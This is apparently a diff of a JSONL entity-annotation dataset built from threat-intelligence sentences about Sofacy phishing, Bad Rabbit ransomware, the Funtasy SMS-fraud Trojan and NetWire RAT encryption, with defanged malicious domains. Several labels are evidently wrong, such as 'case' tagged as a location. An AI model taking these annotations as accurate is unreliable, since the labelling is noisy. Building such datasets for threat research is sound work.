Moscow.","entities":[{"id":46799,"label":"identity","start_offset":9,"end_offset":56},{"id":46801,"label":"location","start_offset":193,"end_offset":206},{"id":46802,"label":"location","start_offset":211,"end_offset":217},{"id":46806,"label":"attack-pattern","start_offset":123,"end_offset":139},{"id":46808,"label":"location","start_offset":251,"end_offset":257},{"id":46807,"label":"identity","start_offset":231,"end_offset":247},{"id":46805,"label":"threat-actor","start_offset":104,"end_offset":116}],"relations":[{"id":226,"from_id":46805,"to_id":46806,"type":"uses"},{"id":227,"from_id":46807,"to_id":46808,"type":"located-at"},{"id":228,"from_id":46805,"to_id":46807,"type":"targets"},{"id":229,"from_id":46805,"to_id":46801,"type":"targets"},{"id":230,"from_id":46805,"to_id":46802,"type":"targets"}],"Comments":[]} -{"id":1541,"text":"Given the significant activity attributed to Sofacy, and the new evidence directly targeting the diplomatic community, Palo Alto Networks wants to ensure that foreign affairs agencies around the world understand how the attacks are carried out, and what agencies and personnel can do to protect themselves.","entities":[{"id":46809,"label":"threat-actor","start_offset":45,"end_offset":51},{"id":46810,"label":"identity","start_offset":119,"end_offset":137}],"relations":[],"Comments":[]} -{"id":1542,"text":"The Sofacy Group (AKA APT28, Grizzly Steppe, Fancy Bear, STRONTIUM, Sednit, Tsar Team, Pawn Storm) is a well-known hacking organization widely reported to be associated with Russia by the US Intelligence Community, numerous media reports and other cybersecurity companies.","entities":[{"id":45045,"label":"threat-actor","start_offset":4,"end_offset":16},{"id":45046,"label":"threat-actor","start_offset":22,"end_offset":27},{"id":45051,"label":"threat-actor","start_offset":76,"end_offset":85},{"id":45052,"label":"threat-actor","start_offset":87,"end_offset":97},{"id":45053,"label":"location","start_offset":174,"end_offset":180},{"id":45054,"label":"identity","start_offset":188,"end_offset":213},{"id":45047,"label":"threat-actor","start_offset":29,"end_offset":43},{"id":45048,"label":"threat-actor","start_offset":45,"end_offset":55},{"id":45049,"label":"threat-actor","start_offset":57,"end_offset":66},{"id":45050,"label":"threat-actor","start_offset":68,"end_offset":74}],"relations":[{"id":59,"from_id":45045,"to_id":45053,"type":"located-at"},{"id":60,"from_id":45046,"to_id":45053,"type":"located-at"},{"id":62,"from_id":45048,"to_id":45053,"type":"located-at"},{"id":63,"from_id":45049,"to_id":45053,"type":"located-at"},{"id":64,"from_id":45050,"to_id":45053,"type":"located-at"},{"id":68,"from_id":45046,"to_id":45045,"type":"duplicate-of"},{"id":69,"from_id":45047,"to_id":45045,"type":"duplicate-of"},{"id":65,"from_id":45051,"to_id":45053,"type":"located-at"},{"id":66,"from_id":45052,"to_id":45053,"type":"located-at"},{"id":70,"from_id":45048,"to_id":45045,"type":"duplicate-of"},{"id":71,"from_id":45049,"to_id":45045,"type":"duplicate-of"},{"id":72,"from_id":45050,"to_id":45045,"type":"duplicate-of"},{"id":61,"from_id":45047,"to_id":45053,"type":"located-at"},{"id":73,"from_id":45051,"to_id":45045,"type":"duplicate-of"},{"id":74,"from_id":45052,"to_id":45045,"type":"duplicate-of"}],"Comments":[]} -{"id":1543,"text":" Sofacy Group has been associated with many attacks against targets around the world, including the International Olympic Committee (IOC) in 2018, the World Anti-Doping Agency in 2016, the Dutch Safety Board in 2015, and German, French, Ukrainian, and Dutch political and military targets throughout 2014 through 2018.","entities":[{"id":46818,"label":"location","start_offset":221,"end_offset":227},{"id":46819,"label":"location","start_offset":229,"end_offset":235},{"id":46820,"label":"location","start_offset":237,"end_offset":246},{"id":46822,"label":"identity","start_offset":151,"end_offset":175},{"id":46812,"label":"identity","start_offset":100,"end_offset":137},{"id":46813,"label":"TIME","start_offset":141,"end_offset":145},{"id":46814,"label":"TIME","start_offset":300,"end_offset":304},{"id":46816,"label":"TIME","start_offset":179,"end_offset":183},{"id":46821,"label":"location","start_offset":252,"end_offset":257},{"id":46823,"label":"identity","start_offset":189,"end_offset":207},{"id":46824,"label":"identity","start_offset":258,"end_offset":288},{"id":46811,"label":"threat-actor","start_offset":1,"end_offset":13},{"id":46815,"label":"TIME","start_offset":313,"end_offset":317},{"id":46817,"label":"TIME","start_offset":211,"end_offset":215}],"relations":[{"id":231,"from_id":46811,"to_id":46812,"type":"targets"},{"id":232,"from_id":46811,"to_id":46822,"type":"targets"},{"id":233,"from_id":46811,"to_id":46823,"type":"targets"},{"id":234,"from_id":46811,"to_id":46824,"type":"targets"},{"id":236,"from_id":46824,"to_id":46818,"type":"located-at"},{"id":237,"from_id":46824,"to_id":46819,"type":"located-at"},{"id":238,"from_id":46824,"to_id":46820,"type":"located-at"},{"id":239,"from_id":46824,"to_id":46821,"type":"located-at"}],"Comments":[]} -{"id":1544,"text":" How the Attacks are Carried Out: Via Email","entities":[],"relations":[],"Comments":[]} -{"id":1545,"text":"These attacks begin with an email sent to a carefully chosen target in the agency.","entities":[],"relations":[],"Comments":[]} -{"id":1546,"text":"The recent spoofed emails we have seen are forged to appear to come from Jane’s 360 Defense Events to tell the recipient about events coming up in 2018.","entities":[{"id":46825,"label":"TIME","start_offset":147,"end_offset":151}],"relations":[],"Comments":[]} -{"id":1547,"text":" The figure below shows an example.","entities":[],"relations":[],"Comments":[]} -{"id":1548,"text":"Once the recipient opens the Excel spreadsheet, she or he does have trouble viewing the document: it opens as a blank spreadsheet.","entities":[{"id":45055,"label":"SOFTWARE","start_offset":29,"end_offset":34}],"relations":[],"Comments":[]} -{"id":1549,"text":"The attackers are relying on the recipient to follow the instruction in the email and click “Enable Content”.","entities":[],"relations":[],"Comments":[]} -{"id":1550,"text":"You can see below what the spreadsheet looks like and the enable content button.","entities":[],"relations":[],"Comments":[]} -{"id":1551,"text":"Clicking the “Enable Content” button is the key to the attack.","entities":[],"relations":[],"Comments":[]} -{"id":1552,"text":"While it makes the text in the spreadsheet visible and so seems to solve the problem, it’s a trick: It’s really running a program that silently installs a program on the system.","entities":[],"relations":[],"Comments":[]} -{"id":1553,"text":"This program gives the attackers complete control over the computer and can enable them to copy documents, usernames, passwords, account information and even take screenshots.","entities":[],"relations":[],"Comments":[]} -{"id":1554,"text":"How you can protect yourself","entities":[],"relations":[],"Comments":[]} -{"id":1555,"text":"There are several things that you can do to help protect against these latest Sofacy attacks and others like it.","entities":[{"id":46826,"label":"threat-actor","start_offset":78,"end_offset":84}],"relations":[],"Comments":[]} -{"id":1556,"text":" With the public awareness of this particular decoy, it is highly likely that the Sofacy group will shift their attacks to spoof emails from a different organization to continue carrying out these attacks.","entities":[{"id":46827,"label":"threat-actor","start_offset":82,"end_offset":94}],"relations":[],"Comments":[]} -{"id":1557,"text":" Additionally, this attack technique is not exclusive to the Sofacy Group.","entities":[{"id":45056,"label":"threat-actor","start_offset":61,"end_offset":73}],"relations":[],"Comments":[]} -{"id":1558,"text":"Therefore, these suggested actions can protect not just against these known attacks but others like it.","entities":[],"relations":[],"Comments":[]} -{"id":1559,"text":" An unexpected email message with an attachment that says you should “enable content” has a high likelihood of being malicious in some way.","entities":[],"relations":[],"Comments":[]} -{"id":1560,"text":"If you get an email like this, you shouldn’t open the attachment and click “enable content”.","entities":[],"relations":[],"Comments":[]} -{"id":1561,"text":"Instead, you should verify that the message and the attachment are legitimate by contacting the sender in some way other than replying to the email (because replying to the email may go back to the attackers who will, of course, say it’s legitimate).","entities":[],"relations":[],"Comments":[]} -{"id":1562,"text":"Or, just delete the message and report it to your security team.","entities":[],"relations":[],"Comments":[]} -{"id":1563,"text":"Palo Alto Networks Unit 42 regularly researches threats like these and provides information about them on our blog.","entities":[{"id":45057,"label":"identity","start_offset":0,"end_offset":26}],"relations":[],"Comments":[]} -{"id":1564,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":1565,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":1566,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":1567,"text":"This Unit 42 blog post provides an update on the threat situation surrounding the Bad Rabbit ransomware attacks.","entities":[{"id":4684,"label":"identity","start_offset":5,"end_offset":12},{"id":4686,"label":"malware","start_offset":82,"end_offset":92}],"relations":[],"Comments":[]} -{"id":1568,"text":" Attack Overview","entities":[],"relations":[],"Comments":[]} -{"id":1569,"text":" Bad Rabbit is a ransomware attack that, at the time of this writing, appears to primarily be affecting countries in Eastern Europe.","entities":[{"id":45059,"label":"malware","start_offset":1,"end_offset":11},{"id":45060,"label":"location","start_offset":117,"end_offset":131}],"relations":[{"id":75,"from_id":45059,"to_id":45060,"type":"targets"}],"Comments":[]} -{"id":1570,"text":"While not spreading as widely as the Petya\/NotPetya attacks, reports indicate that where Bad Rabbit has hit, it has caused severe disruption.","entities":[{"id":4690,"label":"malware","start_offset":37,"end_offset":42},{"id":4691,"label":"malware","start_offset":43,"end_offset":51},{"id":4692,"label":"malware","start_offset":89,"end_offset":99}],"relations":[],"Comments":[]} -{"id":1571,"text":"The Ukrainian CERT has issued an alert on Bad Rabbit.","entities":[{"id":4696,"label":"malware","start_offset":42,"end_offset":52},{"id":46828,"label":"identity","start_offset":4,"end_offset":18}],"relations":[],"Comments":[]} -{"id":1572,"text":" As detailed below, Bad Rabbit gains initial entry by posing as an Adobe Flash update.","entities":[{"id":45062,"label":"malware","start_offset":20,"end_offset":30},{"id":45063,"label":"SOFTWARE","start_offset":67,"end_offset":78}],"relations":[{"id":240,"from_id":45062,"to_id":45063,"type":"related-to"}],"Comments":[]} -{"id":1573,"text":"Once inside a network it spreads by harvesting credentials with the Mimikatz tool as well as using hard coded credentials.","entities":[{"id":46829,"label":"tools","start_offset":68,"end_offset":76},{"id":46830,"label":"attack-pattern","start_offset":36,"end_offset":58},{"id":46831,"label":"attack-pattern","start_offset":99,"end_offset":121}],"relations":[],"Comments":[]} -{"id":1574,"text":" Bad Rabbit is similar to Petya\/NotPetya insofar as it encrypts the entire disk.","entities":[{"id":4702,"label":"malware","start_offset":1,"end_offset":11},{"id":4703,"label":"malware","start_offset":26,"end_offset":31},{"id":4704,"label":"malware","start_offset":32,"end_offset":40}],"relations":[],"Comments":[]} -{"id":1575,"text":" We are not aware of any reports of successful recovery after paying the ransom.","entities":[],"relations":[],"Comments":[]} -{"id":1576,"text":" Because the initial attack vector is through bogus updates, Bad Rabbit attacks can be prevented by only getting Adobe Flash updates from the Adobe web site.","entities":[{"id":4708,"label":"malware","start_offset":61,"end_offset":71},{"id":46832,"label":"SOFTWARE","start_offset":113,"end_offset":124},{"id":46833,"label":"identity","start_offset":142,"end_offset":147}],"relations":[],"Comments":[]} -{"id":1577,"text":" Reconnaissance This attack does not appear to be targeted.","entities":[],"relations":[],"Comments":[]} -{"id":1578,"text":"Therefore, there appears to be little reconnaissance as part of this attack.","entities":[],"relations":[],"Comments":[]} -{"id":1579,"text":" Delivery\/Exploitation","entities":[],"relations":[],"Comments":[]} -{"id":1580,"text":" According to ESET, the initial infection vector for Bad Rabbit is through a fake Adobe Flash update that is offered up from compromised websites.","entities":[{"id":4716,"label":"malware","start_offset":53,"end_offset":63},{"id":46834,"label":"identity","start_offset":14,"end_offset":18},{"id":46835,"label":"SOFTWARE","start_offset":82,"end_offset":93}],"relations":[{"id":241,"from_id":4716,"to_id":46835,"type":"related-to"}],"Comments":[]} -{"id":1581,"text":"Proofpoint researcher Darien Huss‏ has reported this fake update was hosted at 1dnscontrol[.]com.","entities":[{"id":45064,"label":"identity","start_offset":0,"end_offset":10},{"id":45066,"label":"DOMAIN","start_offset":79,"end_offset":96},{"id":45065,"label":"identity","start_offset":22,"end_offset":33}],"relations":[],"Comments":[]} -{"id":1582,"text":"Reports differ on whether this is delivered through social engineering that convinces the user to install the fake update or if it is delivered silently through unpatched vulnerabilities (i.e. “drive-by” installs). Lateral Movement","entities":[],"relations":[],"Comments":[]} -{"id":1583,"text":" Once inside a network, Bad Rabbit propagates itself to other systems.","entities":[{"id":4721,"label":"malware","start_offset":24,"end_offset":34}],"relations":[],"Comments":[]} -{"id":1584,"text":"Reports indicate that it harvests credentials using Mimikatz and Maarten van Dantzig reports it also uses common hardcoded credentials to spread.","entities":[{"id":45067,"label":"tools","start_offset":52,"end_offset":60},{"id":45068,"label":"identity","start_offset":65,"end_offset":84},{"id":45069,"label":"attack-pattern","start_offset":25,"end_offset":45}],"relations":[{"id":76,"from_id":45069,"to_id":45067,"type":"uses"}],"Comments":[]} -{"id":1585,"text":" Command and Control (C2) At this time, we have no information on command and control for Bad Rabbit.","entities":[{"id":46836,"label":"malware","start_offset":91,"end_offset":101}],"relations":[],"Comments":[]} -{"id":1586,"text":" Conclusion Bad Rabbit is not as widespread of an attack as Petya\/NotPetya but is causing severe disruptions where it is occurring.","entities":[{"id":4729,"label":"malware","start_offset":13,"end_offset":23},{"id":4730,"label":"malware","start_offset":61,"end_offset":66},{"id":4731,"label":"malware","start_offset":67,"end_offset":75}],"relations":[],"Comments":[]} -{"id":1587,"text":"It is similar to Petya\/NotPetya in terms of the impact of a successful attack.","entities":[{"id":45070,"label":"malware","start_offset":17,"end_offset":22},{"id":45071,"label":"malware","start_offset":23,"end_offset":31}],"relations":[],"Comments":[]} -{"id":1588,"text":"However, it is a different attack with different malware.","entities":[],"relations":[],"Comments":[]} -{"id":1589,"text":" We will update this blog with new information as it becomes available.","entities":[],"relations":[],"Comments":[]} -{"id":1590,"text":" For information on how Palo Alto Networks products prevent Bad Rabbit, please see our Palo Alto Networks Protections Against Bad Rabbit Ransomware Attacks blog post.","entities":[{"id":45073,"label":"malware","start_offset":60,"end_offset":70},{"id":45074,"label":"identity","start_offset":87,"end_offset":105},{"id":45072,"label":"identity","start_offset":24,"end_offset":42},{"id":45075,"label":"malware","start_offset":130,"end_offset":136}],"relations":[],"Comments":[]} -{"id":1591,"text":" As always if you have any questions, please come to the Threat & Vulnerability Discussions on our Live Community.","entities":[],"relations":[],"Comments":[]} -{"id":1592,"text":" Version Summary October 24, 2017 2:30 p.m. PT Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":46837,"label":"TIME","start_offset":18,"end_offset":47}],"relations":[],"Comments":[]} -{"id":1593,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":1594,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":1595,"text":"Palo Alto Networks WildFire detected a new Android Trojan on May 7th, 2014 when a customer using our enterprise security platform downloaded the malicious application from the Google Play store.","entities":[{"id":46841,"label":"TIME","start_offset":61,"end_offset":74},{"id":46840,"label":"SOFTWARE","start_offset":0,"end_offset":27},{"id":46842,"label":"SOFTWARE","start_offset":176,"end_offset":193}],"relations":[],"Comments":[]} -{"id":1596,"text":"We’ve named the malware family Funtasy, based on the domain it uses for registering compromised phones to the premium SMS service.","entities":[{"id":45076,"label":"malware","start_offset":31,"end_offset":38}],"relations":[],"Comments":[]} -{"id":1597,"text":"The first version of Funtasy we detected is a fake television remote control application.","entities":[{"id":46844,"label":"malware","start_offset":21,"end_offset":28}],"relations":[],"Comments":[]} -{"id":1598,"text":" Figure 1: Funtasy Trojan Disguised as TV Remote Control App.","entities":[{"id":46845,"label":"malware","start_offset":11,"end_offset":18}],"relations":[],"Comments":[]} -{"id":1599,"text":" A developer using the ID “fun app” published the Trojan, and the remote control application they uploaded on April 21 is their most successful app so far, with between 10,000 and 50,000 downloads on the play store.","entities":[{"id":46846,"label":"TIME","start_offset":110,"end_offset":118}],"relations":[],"Comments":[]} -{"id":1600,"text":"Based on the reviews, the application does not function very well as a remote, but in reality it doesn’t contain remote control capability.","entities":[],"relations":[],"Comments":[]} -{"id":1601,"text":"There’s no mention of a premium SMS service in the description, but a review of the permissions reveals that the program will have complete access to SMS messages.","entities":[],"relations":[],"Comments":[]} -{"id":1602,"text":" Figure 2: Remote control app requests complete control over your SMS messages.","entities":[],"relations":[],"Comments":[]} -{"id":1603,"text":" After the user installs the remote application and opens it, they are presented with a terms of service screen.","entities":[],"relations":[],"Comments":[]} -{"id":1604,"text":"This is the user’s only chance to realize that opening this application is going to cost them dearly.","entities":[],"relations":[],"Comments":[]} -{"id":1605,"text":" Figure 3: Remote control app terms of service.","entities":[],"relations":[],"Comments":[]} -{"id":1606,"text":" If you can’t read the fine print, I don’t blame you.","entities":[],"relations":[],"Comments":[]} -{"id":1607,"text":"Here’s the text decoded from the application’s source code.","entities":[],"relations":[],"Comments":[]} -{"id":1608,"text":"Servicio de suscripción para usuarios Movistar, Vodafone, Orange, Yoigo, R y Simyo para mayores de edad o menores con capacidad legal para contratar, prestados por (FUNTASY MOBILE S.L., operador titular ARGATEL SOLUTIONS SL, n. atención al cliente 902 303 803 ó inf@argatel.com, apartado de correos 167, 17001 Girona.","entities":[],"relations":[],"Comments":[]} -{"id":1609,"text":"Coste por SMS recibido 1.46 euros\/sms (IVA incluido) más el coste de navegación WAP, que dependerá del operador que tenga contratado.","entities":[],"relations":[],"Comments":[]} -{"id":1610,"text":"Máximo 10 sms\/semana.","entities":[],"relations":[],"Comments":[]} -{"id":1611,"text":"El límite máximo de facturación del servicio puede variar en función de tu operador (18 a 30 euros\/mes).","entities":[],"relations":[],"Comments":[]} -{"id":1612,"text":"Baja automática para cancelar el servicio: envía BAJA al 797977.","entities":[],"relations":[],"Comments":[]} -{"id":1613,"text":" This message is pretty straightforward, assuming the user actually reads it.","entities":[],"relations":[],"Comments":[]} -{"id":1614,"text":"It explains that by opening the application the reader agrees to receive up to 10 SMS messages a week at a cost of 1.46 euros each.","entities":[],"relations":[],"Comments":[]} -{"id":1615,"text":"The maximum cost per month should between 18 and 30 euros per month.","entities":[],"relations":[],"Comments":[]} -{"id":1616,"text":"If the user would like to unsubscribe they can text “BAJA” to 797977.","entities":[],"relations":[],"Comments":[]} -{"id":1617,"text":"Any user who reads this message and understands it is unlikely to agree, but Funtasy does not even wait for their agreement.","entities":[{"id":46847,"label":"malware","start_offset":77,"end_offset":84}],"relations":[],"Comments":[]} -{"id":1618,"text":" While the terms page is on the screen, in the background the Trojan checks to see if the phone is attached to a network with one of the following mobile network codes (MNC): Each of these networks is Spanish, except for a single Australian network.","entities":[],"relations":[],"Comments":[]} -{"id":1619,"text":"This data, along with an encoded version of the Terms of Service are stored as static strings in the Android package file.","entities":[],"relations":[],"Comments":[]} -{"id":1620,"text":" Constants.java After determining the phone is on one of the correct networks, the malware searches for the phone’s mobile number.","entities":[{"id":45079,"label":"FILEPATH","start_offset":1,"end_offset":15}],"relations":[],"Comments":[]} -{"id":1621,"text":"It does this in three ways:","entities":[],"relations":[],"Comments":[]} -{"id":1622,"text":" Util.java With the phone’s number captured, Funtasy then registers the mobile account with a premium SMS service by sending an HTTP POST request to the following URL. The request is made without the users knowledge, they have no choice to select a number.","entities":[{"id":46848,"label":"FILEPATH","start_offset":1,"end_offset":10}],"relations":[],"Comments":[]} -{"id":1623,"text":"Of course, premium SMS services require that the user confirm that they want to sign up by sending incoming SMS message containing a PIN.","entities":[],"relations":[],"Comments":[]} -{"id":1624,"text":" Funtasy intercepts this message, parses out the PIN and sends it back to the registration server, completing the enrollment process.","entities":[],"relations":[],"Comments":[]} -{"id":1625,"text":" IncomingSms.java Of course, once users begin receiving the SMS messages, they are likely to unsubscribe from the service they never really wanted.","entities":[{"id":46849,"label":"FILEPATH","start_offset":1,"end_offset":17}],"relations":[],"Comments":[]} -{"id":1626,"text":"To prevent this, Funtasy blocks the incoming messages before they are displayed to the user and modifies the time stamp on each message to make them appear to have been received 15 days earlier.","entities":[{"id":46850,"label":"malware","start_offset":17,"end_offset":24}],"relations":[],"Comments":[]} -{"id":1627,"text":"This moves it to the back of the inbox there the victim is unlikely to ever see it.","entities":[],"relations":[],"Comments":[]} -{"id":1628,"text":" Funtasy does this even when the victim uses alternative SMS managers, like Google Hangouts or GO SMS Pro.","entities":[{"id":46851,"label":"SOFTWARE","start_offset":76,"end_offset":91},{"id":46853,"label":"malware","start_offset":1,"end_offset":8},{"id":46852,"label":"SOFTWARE","start_offset":95,"end_offset":105}],"relations":[],"Comments":[]} -{"id":1629,"text":" After evaluating the remote control app and finding malicious behavior, we decided to evaluate all of the other applications published by “fun app”, and found 12 more which all contains the exact same behavior. Figure 4:","entities":[{"id":46854,"label":"identity","start_offset":140,"end_offset":147}],"relations":[],"Comments":[]} -{"id":1630,"text":"Additional “fun app” applications, all contain the Funtasy Trojan.","entities":[{"id":46855,"label":"identity","start_offset":12,"end_offset":19},{"id":46856,"label":"malware","start_offset":51,"end_offset":58}],"relations":[],"Comments":[]} -{"id":1631,"text":" Each of these applications is designed to appear like a legitimate application already in the app store.","entities":[],"relations":[],"Comments":[]} -{"id":1632,"text":"To raise the ranking of these apps, the author appears to have given many of them five-star ratings.","entities":[],"relations":[],"Comments":[]} -{"id":1633,"text":"Unfortunately for them, this gave us additional insight into their operation.","entities":[],"relations":[],"Comments":[]} -{"id":1634,"text":" To rate and comment on applications, users must have a Google account.","entities":[{"id":46857,"label":"SOFTWARE","start_offset":56,"end_offset":62}],"relations":[],"Comments":[]} -{"id":1635,"text":"One account using the name “Oscar Sanchez” gave high ratings and positive comments to many of the “fun app” applications.","entities":[{"id":45081,"label":"identity","start_offset":28,"end_offset":41},{"id":46858,"label":"identity","start_offset":99,"end_offset":106}],"relations":[],"Comments":[]} -{"id":1636,"text":"He also rated apps made by two additional publishers with the names \"MilApps101\" and \"Milapps102.\"","entities":[{"id":46859,"label":"malware","start_offset":69,"end_offset":79},{"id":46860,"label":"malware","start_offset":86,"end_offset":96}],"relations":[],"Comments":[]} -{"id":1637,"text":"Between the two of these developers they have produced five applications, and we’ve found that every one of them contains the Funtasy Trojan.","entities":[{"id":46861,"label":"malware","start_offset":126,"end_offset":133}],"relations":[],"Comments":[]} -{"id":1638,"text":"While the name “Oscar Sanchez” may be a pseudonym","entities":[{"id":45082,"label":"identity","start_offset":16,"end_offset":29}],"relations":[],"Comments":[]} -{"id":1639,"text":", Whois data indicates it was also used to register the domain hosting the Funtasy Mobile premium SMS service.","entities":[{"id":46862,"label":"malware","start_offset":75,"end_offset":82}],"relations":[],"Comments":[]} -{"id":1640,"text":" In total we’ve found 18 different applications in the Google Play store that contain the Funtasy Trojan.","entities":[{"id":46863,"label":"malware","start_offset":90,"end_offset":97},{"id":46864,"label":"SOFTWARE","start_offset":55,"end_offset":66}],"relations":[{"id":242,"from_id":46864,"to_id":46863,"type":"hosts"}],"Comments":[]} -{"id":1641,"text":"Each of these files also has the same internal class structure, which is represented by the tree structure below.","entities":[],"relations":[],"Comments":[]} -{"id":1642,"text":"Figure 5: Funtasy internal class structure.","entities":[],"relations":[],"Comments":[]} -{"id":1643,"text":" Researchers interested in investigating them further can find more information in the table below.","entities":[],"relations":[],"Comments":[]} -{"id":1644,"text":" Using this Trojan the attacker could be generating up to 30 euros per month for over 67,000 infected mobile phones.","entities":[],"relations":[],"Comments":[]} -{"id":1645,"text":"That adds up to 2 million euros per month, but the actual number is likely much lower.","entities":[],"relations":[],"Comments":[]} -{"id":1646,"text":"Many of the users who downloaded the tool may not be using one of the targeted Spanish or Australian networks.","entities":[],"relations":[],"Comments":[]} -{"id":1647,"text":"Figure 6: List of Android APK files infected with Funtasy Trojan ","entities":[{"id":45083,"label":"SOFTWARE","start_offset":18,"end_offset":29},{"id":45084,"label":"malware","start_offset":50,"end_offset":64}],"relations":[],"Comments":[]} -{"id":1648,"text":"Users who want to defend against the Funtasy Trojan should not rely on traditional antivirus programs, as they do not currently detect this threat.","entities":[{"id":46865,"label":"malware","start_offset":37,"end_offset":44}],"relations":[],"Comments":[]} -{"id":1649,"text":"Common sense is the best defense against these types of abusive programs.","entities":[],"relations":[],"Comments":[]} -{"id":1650,"text":"While many users breeze past the list of permissions required when installing new apps, readers of this blog should ask themselves, “Does my electronic bible need to read my SMS messages?” Sign up to receive the latest news, cyber threat intelligence and research from us ","entities":[],"relations":[],"Comments":[]} -{"id":1651,"text":"Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":1652,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":1653,"text":"On July 22, Palo Alto Networks threat intelligence team, Unit 42, released our first report on the evolution of “Silver Spaniel” 419 scammers.","entities":[{"id":45085,"label":"identity","start_offset":12,"end_offset":55},{"id":45086,"label":"identity","start_offset":57,"end_offset":64},{"id":45089,"label":"TIME","start_offset":3,"end_offset":10},{"id":45087,"label":"malware","start_offset":113,"end_offset":127}],"relations":[],"Comments":[]} -{"id":1654,"text":" Of particular note is how these actors use a Remote Administration Tool (RAT) named NetWire (part of the NetWiredRC malware family).","entities":[{"id":46866,"label":"malware","start_offset":85,"end_offset":92},{"id":46867,"label":"malware","start_offset":106,"end_offset":116}],"relations":[{"id":243,"from_id":46866,"to_id":46867,"type":"variant-of"}],"Comments":[]} -{"id":1655,"text":"This RAT gives a remote attacker complete control over a Windows, Mac OS X, or Linux system through a simple graphical user interface.","entities":[{"id":46870,"label":"SOFTWARE","start_offset":78,"end_offset":84},{"id":46868,"label":"SOFTWARE","start_offset":57,"end_offset":64},{"id":46869,"label":"SOFTWARE","start_offset":66,"end_offset":74}],"relations":[],"Comments":[]} -{"id":1656,"text":" To better understand this RAT, our team reverse engineered the communication protocol that NetWire uses.","entities":[{"id":45090,"label":"malware","start_offset":92,"end_offset":99}],"relations":[],"Comments":[]} -{"id":1657,"text":"Today we have released a tool that decrypts NetWire traffic and outputs any commands issued by the attacker.","entities":[{"id":4924,"label":"malware","start_offset":44,"end_offset":51}],"relations":[],"Comments":[]} -{"id":1658,"text":" NetWire uses a custom, TCP-based protocol.","entities":[{"id":4926,"label":"malware","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} -{"id":1659,"text":"The producer of the NetWire WorldWiredLabs, states that the tool uses 256-bit AES encryption, which we found to be accurate.","entities":[{"id":45091,"label":"malware","start_offset":20,"end_offset":42}],"relations":[],"Comments":[]} -{"id":1660,"text":"The tool generates two encryption keys using a static password that the attacker chooses when creating the NetWire binary.","entities":[{"id":46871,"label":"malware","start_offset":107,"end_offset":114}],"relations":[],"Comments":[]} -{"id":1661,"text":"Each packet has the following structure: < 4 Byte Little-Endian length > < 1 Byte Command >","entities":[],"relations":[],"Comments":[]} -{"id":1662,"text":"< Data >","entities":[],"relations":[],"Comments":[]} -{"id":1663,"text":" The shortest possible packet is the “HeartBeat” command, which NetWire generates every 10 seconds.","entities":[{"id":46872,"label":"malware","start_offset":64,"end_offset":71}],"relations":[],"Comments":[]} -{"id":1664,"text":" The initial packet from the client to the server shows a data and command length of 65 bytes (0x41 listed at the beginning of the packet) with a command byte of 0x03. Within that data is a 32-byte seed value followed by a 16-byte initialization vector (IV) value.","entities":[],"relations":[],"Comments":[]} -{"id":1665,"text":"The client then combines the 32-byte seed value with the static password in a predetermined fashion to form an AES key.","entities":[],"relations":[],"Comments":[]} -{"id":1666,"text":"Upon receiving the initial packet, the server uses the seed value and password to generate the client’s session key.","entities":[],"relations":[],"Comments":[]} -{"id":1667,"text":"It then generates its own 32-byte seed value to create it’s own session key and sends the seed value to the client.","entities":[],"relations":[],"Comments":[]} -{"id":1668,"text":"The client combines this with the password and generates the same key.","entities":[],"relations":[],"Comments":[]} -{"id":1669,"text":"At this point, the key exchange is complete and both client and server hold the same two keys, which they can use to encrypt and decrypt traffic.","entities":[],"relations":[],"Comments":[]} -{"id":1670,"text":" With the two keys in place, the malware uses the AES algorithm to encrypt traffic using Output Feedback (OFB) mode (Picture courtesy of Wikipedia). The output of the block cipher encryption is eXclusive OR’ed (XOR’d) with 16 bytes of ciphertext to decrypt. Each subsequent block of ciphertext will use the previous encrypted data as the IV passed into the block cipher encryption function.","entities":[],"relations":[],"Comments":[]} -{"id":1671,"text":"The malware has a full suite of possible commands, 76 to be exact.","entities":[],"relations":[],"Comments":[]} +{"id":13060,"text":"Analysis of Kinsing Malware's Use of Rootkit","entities":[{"id":48892,"label":"malware","start_offset":12,"end_offset":29},{"id":40769,"label":"attack-pattern","start_offset":37,"end_offset":44}],"relations":[],"Comments":[]} +{"id":1676,"text":"This password is set to \u201cPassword\u201d by default, but can be retrieved from NetWire binaries if the attacker used something more secure.","entities":[{"id":4975,"label":"malware","start_offset":73,"end_offset":80}],"relations":[],"Comments":[]} +{"id":8931,"text":"In this case, we can see that it took an hour and a half for the attackers to modify the legitimate installer and add malicious code to it.","entities":[{"id":27616,"label":"location","start_offset":8,"end_offset":12},{"id":27617,"label":"location","start_offset":17,"end_offset":20},{"id":27618,"label":"TIME","start_offset":38,"end_offset":56},{"id":27619,"label":"location","start_offset":110,"end_offset":113}],"relations":[],"Comments":[]} +{"id":7515,"text":"A simple RSA algorithm with very small keys encrypts the message seen above.","entities":[{"id":23365,"label":"identity","start_offset":9,"end_offset":12},{"id":23366,"label":"location","start_offset":33,"end_offset":38}],"relations":[],"Comments":[]} +{"id":13058,"text":"Botnets Have Been Silently Mass-Scanning the Internet for Unsecured ENV Files Security firm Greynoise found that multiple threat actors, while drawing little attention to themselves, have spent the past two to three years mass-scanning the internet for ENV (environment) files that were accidentally uploaded and left exposed on web servers.","entities":[],"relations":[],"Comments":[]} +{"id":4720,"text":"iPhone users could be compromised by receiving a malicious iMessage text, without ever needing to click a malicious link.","entities":[{"id":50620,"label":"SOFTWARE","start_offset":59,"end_offset":67}],"relations":[],"Comments":[]} +{"id":1895,"text":"The threat actor sets up these fake websites describing the application and linking to the Google Play Store to download it, like in the case of the malicious website, pikrpro[.]eu, seen below Another sample website involved the use of a closely copied version of an existing website, with slight changes in the logo and options above the 